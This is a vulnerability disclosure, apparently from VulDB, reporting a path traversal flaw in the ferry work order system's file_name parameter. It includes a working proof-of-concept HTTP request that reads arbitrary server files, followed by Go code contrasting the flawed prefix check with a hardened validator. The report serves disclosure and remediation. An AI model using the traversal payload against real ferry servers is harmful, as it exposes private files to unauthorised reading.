Submit #50729: ferry work order system background arbitrary file reading

Title: ferry work order system background arbitrary file reading
Description: Hello, I am submitting an authorized arbitrary file read in the ferry system.

File address: https://github.com/lanyulei/ferry/blob/master/apis/process/task.go

The TaskDetails function accepts file_name from the GET request. The judgment is as follows:

    fileName == "" || strings.HasPrefix(fileName, ".") || strings.HasPrefix(fileName, "/") || strings.HasPrefix(fileName, "\\") // it only verifies the beginning

This judgment cannot prevent the loophole. We can set file_name to ls.txt/../../anyfile. At this time, the system will return the file content, causing an arbitrary file read vulnerability.

Here is what I reproduced locally. I used golang 1.16.15 to build in a Windows environment.

    GET /api/v1/details?file_name=1.txt/../../../../../../../../../../../../test.txt HTTP/1.1
    Host: 127.0.0.1:8002
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: script
    Referer: http://127.0.0.1:8002/
    Accept-Encoding: gzip, deflate
    Cookie: Hm_lvt_1d2d61263f13e4b288c8da19ad3ff56d=1667456630; Hm_lpvt_1d2d61263f13e4b288c8da19ad3ff56d=1667456630
    Connection: close

My test.txt file is in the root directory of the E drive, and at this point I can read it.

Project address: https://github.com/lanyulei/ferry

Thanks for your review.
User: qsec (UID 33968)
Submission: 11/03/2022 09:33 (4 years ago)
Moderation: 11/11/2022 07:56 (8 days later)
Status: Accepted
VulDB entry: 213447 [lanyulei ferry apis/process/task.go file_name path traversal]
Points: 17
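The report's core point is that a prefix-only check on file_name does not stop a name such as ls.txt/../../anyfile, because the dangerous component sits after the first segment. The following Go program is an added example, not code from the ferry project: prefixOnlyCheck reproduces the quoted prefix-only logic so the gap can be seen, and safeJoin is a hypothetical hardened replacement that accepts only a bare file name (no path separators, no leading dot) and, as defence in depth, confirms that the cleaned path still lies under the base directory. The base directory /srv/ferry/uploads and both function names are assumptions for the example.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// prefixOnlyCheck mirrors the validation quoted in the report: it rejects an
// empty name or one that starts with ".", "/" or "\" and nothing else.
// It returns true when the name would be rejected.
func prefixOnlyCheck(fileName string) bool {
	return fileName == "" ||
		strings.HasPrefix(fileName, ".") ||
		strings.HasPrefix(fileName, "/") ||
		strings.HasPrefix(fileName, "\\")
}

var errBadName = errors.New("invalid file name")

// safeJoin is a hypothetical hardened replacement. It accepts only a bare
// file name and returns the full path of that name under baseDir.
func safeJoin(baseDir, fileName string) (string, error) {
	if fileName == "" {
		return "", errBadName
	}
	// A bare file name has no path components at all: reject both
	// separator styles anywhere in the string, not only at the start.
	if strings.ContainsAny(fileName, `/\`) {
		return "", errBadName
	}
	// Reject dot files and the "." / ".." components.
	if strings.HasPrefix(fileName, ".") {
		return "", errBadName
	}
	// Defence in depth: after joining and cleaning, the result must still
	// resolve inside baseDir.
	base := filepath.Clean(baseDir)
	full := filepath.Join(base, fileName)
	rel, err := filepath.Rel(base, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", errBadName
	}
	return full, nil
}

func main() {
	// Constructed sample names: a normal name, the traversal shape from the
	// report, a Windows-style traversal, and a dot file.
	names := []string{"ls.txt", "ls.txt/../../anyfile", `..\..\test.txt`, ".hidden"}
	for _, name := range names {
		_, err := safeJoin("/srv/ferry/uploads", name)
		fmt.Printf("%-24q prefix-only rejects: %-5v hardened rejects: %v\n",
			name, prefixOnlyCheck(name), err != nil)
	}
}
```

Running it shows that the prefix-only check accepts ls.txt/../../anyfile while the hardened check rejects it; the separator check alone is what closes the gap, and the filepath.Rel test only guards against future changes to the name rules.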
